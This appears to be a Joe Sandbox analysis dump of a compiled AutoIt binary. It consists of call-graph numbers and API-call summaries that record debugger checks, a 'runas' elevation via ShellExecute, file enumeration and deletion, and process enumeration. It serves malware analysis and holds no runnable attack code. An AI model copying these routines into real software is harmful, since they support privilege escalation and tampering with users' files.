96970->97021 96971 6a8d45 97045 693fe1 81 API calls __wsopen_s 96971->97045 96974 6a8d50 GetCurrentProcess TerminateProcess 96974->96970 96975->96750 96979 631ca0 8 API calls 96982 6a8d9e 96979->96982 96980->96955 
96980->96962 96980->96975 97043 684ad3 8 API calls __fread_nolock 96980->97043 97044 6a8f7a 41 API calls _strftime 96980->97044 96981 6a8f22 96981->96975 96983 6a8f36 FreeLibrary 96981->96983 96984 6a95d8 74 API calls 96982->96984 96983->96975 96988 6a8daf 96984->96988 96985 631ca0 8 API calls 96985->96988 96988->96981 96988->96985 97032 6a95d8 96988->97032 97046 62b4c8 8 API calls 96988->97046 97048 62c2c9 96989->97048 96991 6a974b CharLowerBuffW 97054 689805 96991->97054 96998 6a979b 97078 62adf4 96998->97078 97000 6a98bb _wcslen 97000->96980 97001 6a97a5 _wcslen 97001->97000 97082 6a8f7a 41 API calls _strftime 97001->97082 97003 6a8949 97002->97003 97004 6a88fe 97002->97004 97008 6a9af3 97003->97008 97005 64017b 8 API calls 97004->97005 97006 6a8920 97005->97006 97006->97003 97007 64014b 8 API calls 97006->97007 97007->97006 97009 6a9d08 messages 97008->97009 97014 6a9b17 _strcat _wcslen ___std_exception_copy 97008->97014 97009->96967 97010 62c63f 39 API calls 97010->97014 97011 62c98d 39 API calls 97011->97014 97012 62ca5b 39 API calls 97012->97014 97013 628ec0 52 API calls 97013->97014 97014->97009 97014->97010 97014->97011 97014->97012 97014->97013 97086 68f8c5 10 API calls _wcslen 97014->97086 97018 63fff5 97016->97018 97017 64008d Sleep 97019 64005b 97017->97019 97018->97017 97018->97019 97020 64007b CloseHandle 97018->97020 97019->96970 97019->96971 97020->97019 97022 627e1a 97021->97022 97023 64014b 8 API calls 97022->97023 97024 627e28 97023->97024 97087 628445 97024->97087 97027 628470 97090 62c760 97027->97090 97029 628480 97030 64017b 8 API calls 97029->97030 97031 62851c 97029->97031 97030->97031 97031->96979 97031->96988 97033 6a95f0 97032->97033 97037 6a960c 97032->97037 97034 6a9618 97033->97034 97035 6a96c1 97033->97035 97036 6a95f7 97033->97036 97033->97037 97101 626c03 8 API calls 97034->97101 97102 69169e 72 API calls messages 97035->97102 97099 68f4e8 10 API calls _strlen 97036->97099 97037->96988 97041 6a9601 97100 626c03 8 API calls 
97041->97100 97043->96980 97044->96980 97045->96974 97046->96988 97047->96959 97049 62c2dc 97048->97049 97053 62c2d9 __fread_nolock 97048->97053 97050 64014b 8 API calls 97049->97050 97051 62c2e7 97050->97051 97052 64017b 8 API calls 97051->97052 97052->97053 97053->96991 97055 689825 _wcslen 97054->97055 97056 689914 97055->97056 97059 68985a 97055->97059 97060 689919 97055->97060 97056->97001 97061 62bf73 97056->97061 97059->97056 97083 63e36b 41 API calls 97059->97083 97060->97056 97084 63e36b 41 API calls 97060->97084 97062 64017b 8 API calls 97061->97062 97063 62bf88 97062->97063 97064 64014b 8 API calls 97063->97064 97065 62bf96 97064->97065 97066 62acc0 97065->97066 97067 62accf 97066->97067 97070 62ace1 97066->97070 97068 62c2c9 8 API calls 97067->97068 97075 62acda __fread_nolock 97067->97075 97069 6705a3 __fread_nolock 97068->97069 97070->97067 97071 670557 97070->97071 97072 62ad07 97070->97072 97074 64014b 8 API calls 97071->97074 97085 6288e8 8 API calls 97072->97085 97076 670561 97074->97076 97075->96998 97077 64017b 8 API calls 97076->97077 97077->97067 97079 62ae02 97078->97079 97081 62ae0b __fread_nolock 97078->97081 97080 62c2c9 8 API calls 97079->97080 97079->97081 97080->97081 97081->97001 97082->97000 97083->97059 97084->97060 97085->97075 97086->97014 97088 64014b 8 API calls 97087->97088 97089 627e30 97088->97089 97089->97027 97091 62c76b 97090->97091 97092 671285 97091->97092 97097 62c773 messages 97091->97097 97094 64014b 8 API calls 97092->97094 97093 62c77a 97093->97029 97095 671291 97094->97095 97097->97093 97098 62c7e0 8 API calls messages 97097->97098 97098->97097 97099->97041 97100->97037 97101->97037 97102->97037 97104 62bf73 8 API calls 97103->97104 97105 68dc73 97104->97105 97106 62bf73 8 API calls 97105->97106 97107 68dc7c 97106->97107 97108 62bf73 8 API calls 97107->97108 97109 68dc85 97108->97109 97127 625851 97109->97127 97114 68dcab 97139 62568e 97114->97139 97115 626b7c 8 API calls 97115->97114 97117 68dcbf FindFirstFileW 
97118 68dd4b FindClose 97117->97118 97121 68dcde 97117->97121 97122 68dd56 97118->97122 97119 68dd26 FindNextFileW 97119->97121 97120 62bed9 8 API calls 97120->97121 97121->97118 97121->97119 97121->97120 97181 627bb5 97121->97181 97190 626b7c 97121->97190 97122->96758 97126 68dd42 FindClose 97126->97122 97199 6622d0 97127->97199 97130 625898 97217 62bd57 97130->97217 97131 62587d 97205 628577 97131->97205 97134 625889 97201 6255dc 97134->97201 97137 68eab0 GetFileAttributesW 97138 68dc99 97137->97138 97138->97114 97138->97115 97140 62bf73 8 API calls 97139->97140 97141 6256a4 97140->97141 97142 62bf73 8 API calls 97141->97142 97143 6256ac 97142->97143 97144 62bf73 8 API calls 97143->97144 97145 6256b4 97144->97145 97146 62bf73 8 API calls 97145->97146 97147 6256bc 97146->97147 97148 6256f0 97147->97148 97149 664da1 97147->97149 97150 62acc0 8 API calls 97148->97150 97151 62bed9 8 API calls 97149->97151 97153 6256fe 97150->97153 97152 664daa 97151->97152 97154 62bd57 8 API calls 97152->97154 97155 62adf4 8 API calls 97153->97155 97157 625733 97154->97157 97156 625708 97155->97156 97156->97157 97158 62acc0 8 API calls 97156->97158 97159 625778 97157->97159 97160 625754 97157->97160 97169 664dcc 97157->97169 97162 625729 97158->97162 97161 62acc0 8 API calls 97159->97161 97160->97159 97224 62655e 97160->97224 97163 625789 97161->97163 97164 62adf4 8 API calls 97162->97164 97166 62579f 97163->97166 97172 62bed9 8 API calls 97163->97172 97164->97157 97170 6257b3 97166->97170 97173 62bed9 8 API calls 97166->97173 97168 628577 8 API calls 97176 664e8c 97168->97176 97169->97168 97171 6257be 97170->97171 97175 62bed9 8 API calls 97170->97175 97177 62bed9 8 API calls 97171->97177 97179 6257c9 97171->97179 97172->97166 97173->97170 97174 62acc0 8 API calls 97174->97159 97175->97171 97176->97159 97178 62655e 8 API calls 97176->97178 97227 62ad40 8 API calls __fread_nolock 97176->97227 97177->97179 97178->97176 97179->97117 97182 627bc7 97181->97182 97183 66641d 97181->97183 
97228 627bd8 97182->97228 97238 6813c8 8 API calls __fread_nolock 97183->97238 97186 627bd3 97186->97121 97187 666427 97188 666433 97187->97188 97189 62bed9 8 API calls 97187->97189 97189->97188 97191 626b93 97190->97191 97192 6657fe 97190->97192 97244 626ba4 97191->97244 97194 64014b 8 API calls 97192->97194 97196 665808 _wcslen 97194->97196 97195 626b9e DeleteFileW 97195->97119 97195->97126 97197 64017b 8 API calls 97196->97197 97198 665841 __fread_nolock 97197->97198 97200 62585e GetFullPathNameW 97199->97200 97200->97130 97200->97131 97202 6255ea 97201->97202 97203 62adf4 8 API calls 97202->97203 97204 6255fe 97203->97204 97204->97137 97206 666610 97205->97206 97207 628587 _wcslen 97205->97207 97208 62adf4 8 API calls 97206->97208 97210 6285c2 97207->97210 97211 62859d 97207->97211 97209 666619 97208->97209 97209->97209 97213 64014b 8 API calls 97210->97213 97223 6288e8 8 API calls 97211->97223 97214 6285ce 97213->97214 97216 64017b 8 API calls 97214->97216 97215 6285a5 __fread_nolock 97215->97134 97216->97215 97218 62bd71 97217->97218 97219 62bd64 97217->97219 97220 64014b 8 API calls 97218->97220 97219->97134 97221 62bd7b 97220->97221 97222 64017b 8 API calls 97221->97222 97222->97219 97223->97215 97225 62c2c9 8 API calls 97224->97225 97226 625761 97225->97226 97226->97159 97226->97174 97227->97176 97229 627be7 97228->97229 97235 627c1b __fread_nolock 97228->97235 97230 66644e 97229->97230 97231 627c0e 97229->97231 97229->97235 97233 64014b 8 API calls 97230->97233 97239 627d74 97231->97239 97234 66645d 97233->97234 97236 64017b 8 API calls 97234->97236 97235->97186 97237 666491 __fread_nolock 97236->97237 97238->97187 97240 627d8a 97239->97240 97242 627d85 __fread_nolock 97239->97242 97241 64017b 8 API calls 97240->97241 97243 666528 97240->97243 97241->97242 97242->97235 97243->97243 97245 626bb4 _wcslen 97244->97245 97246 626bc7 97245->97246 97247 665860 97245->97247 97248 627d74 8 API calls 97246->97248 97249 64014b 8 API calls 97247->97249 97250 626bd4 
__fread_nolock 97248->97250 97251 66586a 97249->97251 97250->97195 97252 64017b 8 API calls 97251->97252 97253 66589a __fread_nolock 97252->97253 97255 64017b 8 API calls 97254->97255 97256 627afa 97255->97256 97257 64014b 8 API calls 97256->97257 97258 627b08 97257->97258 97258->96772 97259 62c98d 97258->97259 97260 62c99e 97259->97260 97261 62c9a5 97259->97261 97260->97261 97283 646641 39 API calls _strftime 97260->97283 97261->96774 97263 62c9e8 97263->96774 97264->96830 97266 64014b 8 API calls 97265->97266 97267 62894a 97266->97267 97267->96830 97269 628a76 97268->97269 97270 666737 97269->97270 97276 628a80 97269->97276 97284 63b7a2 8 API calls 97270->97284 97271 666744 97285 62b4c8 8 API calls 97271->97285 97274 666762 97274->97274 97275 628b94 97277 64014b 8 API calls 97275->97277 97276->97271 97276->97275 97278 628b9b 97276->97278 97277->97278 97278->96830 97279->96809 97280->96812 97281->96826 97282->96831 97283->97263 97284->97271 97285->97274 97287 6918b6 97286->97287 97288 64014b 8 API calls 97287->97288 97289 6918bd 97288->97289 97292 68fcb5 97289->97292 97291 6918f7 97291->96841 97293 62c2c9 8 API calls 97292->97293 97294 68fcc8 CharLowerBuffW 97293->97294 97296 68fcdb 97294->97296 97295 68fd19 97297 68fd2b 97295->97297 97299 62655e 8 API calls 97295->97299 97296->97295 97298 62655e 8 API calls 97296->97298 97309 68fce5 ___scrt_fastfail 97296->97309 97300 64017b 8 API calls 97297->97300 97298->97296 97299->97297 97304 68fd59 97300->97304 97303 68fdb8 97306 64014b 8 API calls 97303->97306 97303->97309 97305 68fd7b 97304->97305 97325 68fbed 8 API calls 97304->97325 97310 68fe0c 97305->97310 97307 68fdd2 97306->97307 97308 64017b 8 API calls 97307->97308 97308->97309 97309->97291 97311 62bf73 8 API calls 97310->97311 97312 68fe3e 97311->97312 97313 62bf73 8 API calls 97312->97313 97314 68fe47 97313->97314 97315 62bf73 8 API calls 97314->97315 97323 68fe50 97315->97323 97316 690114 97316->97303 97317 628577 8 API calls 97317->97323 97318 6466f8 
GetStringTypeW 97318->97323 97319 62ad40 8 API calls 97319->97323 97321 646641 39 API calls 97321->97323 97322 68fe0c 40 API calls 97322->97323 97323->97316 97323->97317 97323->97318 97323->97319 97323->97321 97323->97322 97324 62bed9 8 API calls 97323->97324 97326 646722 GetStringTypeW _strftime 97323->97326 97324->97323 97325->97304 97326->97323 97328 64014b 8 API calls 97327->97328 97329 63bc65 97328->97329 97330 62b329 8 API calls 97329->97330 97331 63bc70 97330->97331 97331->96846 97333 623996 ___scrt_fastfail 97332->97333 97358 625f32 97333->97358 97336 623a1c 97338 623a3a Shell_NotifyIconW 97336->97338 97339 6640cd Shell_NotifyIconW 97336->97339 97362 6261a9 97338->97362 97341 623a50 97341->96852 97343 623969 97342->97343 97344 623919 ___scrt_fastfail 97342->97344 97343->96852 97345 623938 Shell_NotifyIconW 97344->97345 97345->97343 97347 644da6 97346->97347 97348 644e1b 97346->97348 97355 644dcb 97347->97355 97395 64f649 20 API calls __dosmaperr 97347->97395 97397 644e2d 40 API calls 4 library calls 97348->97397 97351 644e28 97351->96852 97352 644db2 97396 652b5c 26 API calls pre_c_initialization 97352->97396 97354 644dbd 97354->96852 97355->96852 97356->96852 97357->96852 97359 6239eb 97358->97359 97360 625f4e 97358->97360 97359->97336 97392 68d11f 42 API calls _strftime 97359->97392 97360->97359 97361 665070 DestroyIcon 97360->97361 97361->97359 97363 6261c6 97362->97363 97364 6262a8 97362->97364 97365 627ad5 8 API calls 97363->97365 97364->97341 97366 6261d4 97365->97366 97367 6261e1 97366->97367 97368 665278 LoadStringW 97366->97368 97369 628577 8 API calls 97367->97369 97371 665292 97368->97371 97370 6261f6 97369->97370 97372 626203 97370->97372 97379 6652ae 97370->97379 97374 62bed9 8 API calls 97371->97374 97377 626229 ___scrt_fastfail 97371->97377 97372->97371 97373 62620d 97372->97373 97375 626b7c 8 API calls 97373->97375 97374->97377 97376 62621b 97375->97376 97378 627bb5 8 API calls 97376->97378 97381 62628e Shell_NotifyIconW 97377->97381 
97378->97377 97379->97377 97380 6652f1 97379->97380 97382 62bf73 8 API calls 97379->97382 97394 63fe6f 51 API calls 97380->97394 97381->97364 97383 6652d8 97382->97383 97393 68a350 9 API calls 97383->97393 97386 6652e3 97388 627bb5 8 API calls 97386->97388 97387 665310 97389 626b7c 8 API calls 97387->97389 97388->97380 97390 665321 97389->97390 97391 626b7c 8 API calls 97390->97391 97391->97377 97392->97336 97393->97386 97394->97387 97395->97352 97396->97354 97397->97351 97408 68e80e 97398->97408 97400 68ddd4 Process32NextW 97401 68de86 CloseHandle 97400->97401 97407 68ddcd 97400->97407 97401->96865 97402 62bf73 8 API calls 97402->97407 97403 62b329 8 API calls 97403->97407 97404 62568e 8 API calls 97404->97407 97405 627bb5 8 API calls 97405->97407 97407->97400 97407->97401 97407->97402 97407->97403 97407->97404 97407->97405 97414 63e36b 41 API calls 97407->97414 97409 68e819 97408->97409 97410 68e830 97409->97410 97413 68e836 97409->97413 97415 646722 GetStringTypeW _strftime 97409->97415 97416 64666b 39 API calls _strftime 97410->97416 97413->97407 97414->97407 97415->97409 97416->97413 97418 64017b 8 API calls 97417->97418 97419 63c209 97418->97419 97420 64014b 8 API calls 97419->97420 97421 63c215 97420->97421 97421->96874 97423 63fa35 97422->97423 97424 63f9fe 97422->97424 97434 63fe8a 8 API calls 97423->97434 97425 64017b 8 API calls 97424->97425 97427 63fa05 WideCharToMultiByte 97425->97427 97433 63fa3e 8 API calls __fread_nolock 97427->97433 97429 63fa29 97429->96879 97431 64014b 8 API calls 97430->97431 97432 62424e 97431->97432 97432->96886 97432->96887 97433->97429 97434->97429 97435->96899 97436->96910 97437->96916 97438->96910 97439->96932 97440->96910 97441->96684 97442->96684 97443->96692 97444->96689 97445->96581 97446->96578 97447->96579 97448->96579 97449 621044 97454 622793 97449->97454 97451 62104a 97490 640413 29 API calls __onexit 97451->97490 97453 621054 97491 622a38 97454->97491 97458 62280a 97459 62bf73 8 API calls 97458->97459 97460 
622814 97459->97460 97461 62bf73 8 API calls 97460->97461 97462 62281e 97461->97462 97463 62bf73 8 API calls 97462->97463 97464 622828 97463->97464 97465 62bf73 8 API calls 97464->97465 97466 622866 97465->97466 97467 62bf73 8 API calls 97466->97467 97468 622932 97467->97468 97501 622dbc 97468->97501 97472 622964 97473 62bf73 8 API calls 97472->97473 97474 62296e 97473->97474 97475 633160 9 API calls 97474->97475 97476 622999 97475->97476 97528 623166 97476->97528 97478 6229b5 97479 6229c5 GetStdHandle 97478->97479 97480 6639e7 97479->97480 97481 622a1a 97479->97481 97480->97481 97482 6639f0 97480->97482 97484 622a27 OleInitialize 97481->97484 97483 64014b 8 API calls 97482->97483 97485 6639f7 97483->97485 97484->97451 97535 690ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97485->97535 97487 663a00 97536 6912eb CreateThread 97487->97536 97489 663a0c CloseHandle 97489->97481 97490->97453 97537 622a91 97491->97537 97494 622a91 8 API calls 97495 622a70 97494->97495 97496 62bf73 8 API calls 97495->97496 97497 622a7c 97496->97497 97498 628577 8 API calls 97497->97498 97499 6227c9 97498->97499 97500 62327e 6 API calls 97499->97500 97500->97458 97502 62bf73 8 API calls 97501->97502 97503 622dcc 97502->97503 97504 62bf73 8 API calls 97503->97504 97505 622dd4 97504->97505 97544 6281d6 97505->97544 97508 6281d6 8 API calls 97509 622de4 97508->97509 97510 62bf73 8 API calls 97509->97510 97511 622def 97510->97511 97512 64014b 8 API calls 97511->97512 97513 62293c 97512->97513 97514 623205 97513->97514 97515 623213 97514->97515 97516 62bf73 8 API calls 97515->97516 97517 62321e 97516->97517 97518 62bf73 8 API calls 97517->97518 97519 623229 97518->97519 97520 62bf73 8 API calls 97519->97520 97521 623234 97520->97521 97522 62bf73 8 API calls 97521->97522 97523 62323f 97522->97523 97524 6281d6 8 API calls 97523->97524 97525 62324a 97524->97525 97526 64014b 8 API calls 97525->97526 97527 623251 
RegisterWindowMessageW 97526->97527 97527->97472 97529 623176 97528->97529 97530 663c8f 97528->97530 97532 64014b 8 API calls 97529->97532 97547 693c4e 8 API calls 97530->97547 97534 62317e 97532->97534 97533 663c9a 97534->97478 97535->97487 97536->97489 97548 6912d1 14 API calls 97536->97548 97538 62bf73 8 API calls 97537->97538 97539 622a9c 97538->97539 97540 62bf73 8 API calls 97539->97540 97541 622aa4 97540->97541 97542 62bf73 8 API calls 97541->97542 97543 622a66 97542->97543 97543->97494 97545 62bf73 8 API calls 97544->97545 97546 622ddc 97545->97546 97546->97508 97547->97533 97549 62f5e5 97552 62cab0 97549->97552 97553 62cacb 97552->97553 97554 6714be 97553->97554 97555 67150c 97553->97555 97575 62caf0 97553->97575 97558 6714c8 97554->97558 97561 6714d5 97554->97561 97554->97575 97596 6a62ff 207 API calls 2 library calls 97555->97596 97594 6a6790 207 API calls 97558->97594 97560 63bc58 8 API calls 97560->97575 97574 62cdc0 97561->97574 97595 6a6c2d 207 API calls 2 library calls 97561->97595 97564 67179f 97564->97564 97566 62cf80 39 API calls 97566->97575 97568 63e807 39 API calls 97568->97575 97570 62cdee 97571 6716e8 97599 6a6669 81 API calls 97571->97599 97574->97570 97600 693fe1 81 API calls __wsopen_s 97574->97600 97575->97560 97575->97566 97575->97568 97575->97570 97575->97571 97575->97574 97580 630340 207 API calls 97575->97580 97581 62bed9 8 API calls 97575->97581 97583 62be2d 97575->97583 97587 63e7c1 39 API calls 97575->97587 97588 63aa99 207 API calls 97575->97588 97589 6405b2 5 API calls __Init_thread_wait 97575->97589 97590 640413 29 API calls __onexit 97575->97590 97591 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97575->97591 97592 63f4df 81 API calls 97575->97592 97593 63f346 207 API calls 97575->97593 97597 62b4c8 8 API calls 97575->97597 97598 67ffaf 8 API calls 97575->97598 97580->97575 97581->97575 97584 62be38 97583->97584 97585 62be67 97584->97585 97601 62bfa5 39 API calls 97584->97601 97585->97575 97587->97575 
97588->97575 97589->97575 97590->97575 97591->97575 97592->97575 97593->97575 97594->97561 97595->97574 97596->97575 97597->97575 97598->97575 97599->97574 97600->97564 97601->97585 97602 658782 97607 65853e 97602->97607 97606 6587aa 97608 65856f try_get_first_available_module 97607->97608 97618 6586b8 97608->97618 97622 64917b 40 API calls 2 library calls 97608->97622 97610 65876e 97626 652b5c 26 API calls pre_c_initialization 97610->97626 97612 6586c3 97612->97606 97619 660d04 97612->97619 97614 65870c 97614->97618 97623 64917b 40 API calls 2 library calls 97614->97623 97616 65872b 97616->97618 97624 64917b 40 API calls 2 library calls 97616->97624 97618->97612 97625 64f649 20 API calls __dosmaperr 97618->97625 97627 660401 97619->97627 97621 660d1f 97621->97606 97622->97614 97623->97616 97624->97618 97625->97610 97626->97612 97630 66040d ___BuildCatchObject 97627->97630 97628 66041b 97685 64f649 20 API calls __dosmaperr 97628->97685 97630->97628 97632 660454 97630->97632 97631 660420 97686 652b5c 26 API calls pre_c_initialization 97631->97686 97638 6609db 97632->97638 97637 66042a __fread_nolock 97637->97621 97688 6607af 97638->97688 97641 660a26 97706 655594 97641->97706 97642 660a0d 97720 64f636 20 API calls __dosmaperr 97642->97720 97645 660a2b 97646 660a34 97645->97646 97647 660a4b 97645->97647 97722 64f636 20 API calls __dosmaperr 97646->97722 97719 66071a CreateFileW 97647->97719 97651 660a39 97723 64f649 20 API calls __dosmaperr 97651->97723 97652 660a84 97654 660b01 GetFileType 97652->97654 97656 660ad6 GetLastError 97652->97656 97724 66071a CreateFileW 97652->97724 97655 660b0c GetLastError 97654->97655 97660 660b53 97654->97660 97726 64f613 20 API calls __dosmaperr 97655->97726 97725 64f613 20 API calls __dosmaperr 97656->97725 97659 660b1a CloseHandle 97662 660a12 97659->97662 97663 660b43 97659->97663 97728 6554dd 21 API calls 2 library calls 97660->97728 97721 64f649 20 API calls __dosmaperr 97662->97721 97727 64f649 20 API calls __dosmaperr 
99360->99334 99361->99353

                                                                  Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 00625FF7
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • GetCurrentProcess.KERNEL32(?,006BDC2C,00000000,?,?), ref: 00626123
                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 0062612A
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00626155
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00626167
                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00626175
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0062617C
                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 006261A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                  • API String ID: 3290436268-3101561225
                                                                  • Opcode ID: f443f92faed25aff5a0085cf00af0472d5e80d5044cd7d0ca0299847456dd3da
                                                                  • Instruction ID: 020178ad5d0fcb7f0eb424d4855959f299c857d1c38c6b51a0ad5ed50cb7eb61
                                                                  • Opcode Fuzzy Hash: f443f92faed25aff5a0085cf00af0472d5e80d5044cd7d0ca0299847456dd3da
                                                                  • Instruction Fuzzy Hash: 87A1A2B384AAE6CFCB11CB6CBC651F57F976B36700B087899E48197222D22D5549CF31

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00623368,?), ref: 006233BB
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00623368,?), ref: 006233CE
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,006F2418,006F2400,?,?,?,?,?,?,00623368,?), ref: 0062343A
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                    • Part of subcall function 0062425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623462,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 006242A0
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 006234BB
                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00663CB0
                                                                  • SetCurrentDirectoryW.KERNEL32(?,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 00663CF1
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006E31F4,006F2418,?,?,?,?,?,?,?,00623368), ref: 00663D7A
                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00663D81
                                                                    • Part of subcall function 006234D3: GetSysColorBrush.USER32(0000000F), ref: 006234DE
                                                                    • Part of subcall function 006234D3: LoadCursorW.USER32(00000000,00007F00), ref: 006234ED
                                                                    • Part of subcall function 006234D3: LoadIconW.USER32(00000063), ref: 00623503
                                                                    • Part of subcall function 006234D3: LoadIconW.USER32(000000A4), ref: 00623515
                                                                    • Part of subcall function 006234D3: LoadIconW.USER32(000000A2), ref: 00623527
                                                                    • Part of subcall function 006234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0062353F
                                                                    • Part of subcall function 006234D3: RegisterClassExW.USER32(?), ref: 00623590
                                                                    • Part of subcall function 006235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006235E1
                                                                    • Part of subcall function 006235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623602
                                                                    • Part of subcall function 006235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 00623616
                                                                    • Part of subcall function 006235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 0062361F
                                                                    • Part of subcall function 0062396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00623A3C
                                                                  Strings
                                                                  • runas, xrefs: 00663D75
                                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00663CAA
                                                                  • AutoIt, xrefs: 00663CA5
                                                                  • 0$o, xrefs: 00623495
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                  • String ID: 0$o$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                  • API String ID: 683915450-109674955
                                                                  • Opcode ID: 011d21d11805b255b4091b1acc71ba8e94459695ce8717d9631071d159d08805
                                                                  • Instruction ID: dc1c57f74672b76cd47da28b40fa26d2e0fdc85d98bb8f9c6656f0458d786c2b
                                                                  • Opcode Fuzzy Hash: 011d21d11805b255b4091b1acc71ba8e94459695ce8717d9631071d159d08805
                                                                  • Instruction Fuzzy Hash: C9512A71108776AAC701FF60EC11DBE7BEB9F91740F00252CF581563A2DB648A8ACF56

                                                                  Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                  APIs
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                    • Part of subcall function 0068EAB0: GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0068DCCB
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0068DD1B
                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0068DD2C
                                                                  • FindClose.KERNEL32(00000000), ref: 0068DD43
                                                                  • FindClose.KERNEL32(00000000), ref: 0068DD4C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 2649000838-1173974218
                                                                  • Opcode ID: dc718431a9f34514a2313ac72a65bb11a11d0ba64e2b96b9e4144b4fd6294825
                                                                  • Instruction ID: 07e540027f54872c2be7ddb220bb58e13c28fdc83c7af0fae62bc56a7dfdfd09
                                                                  • Opcode Fuzzy Hash: dc718431a9f34514a2313ac72a65bb11a11d0ba64e2b96b9e4144b4fd6294825
                                                                  • Instruction Fuzzy Hash: E0319E310087959BC340FF20D8918EFB7EAAE95300F405E1DF4D186191EB21DA09CB67
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0068DDAC
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0068DDBA
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0068DDDA
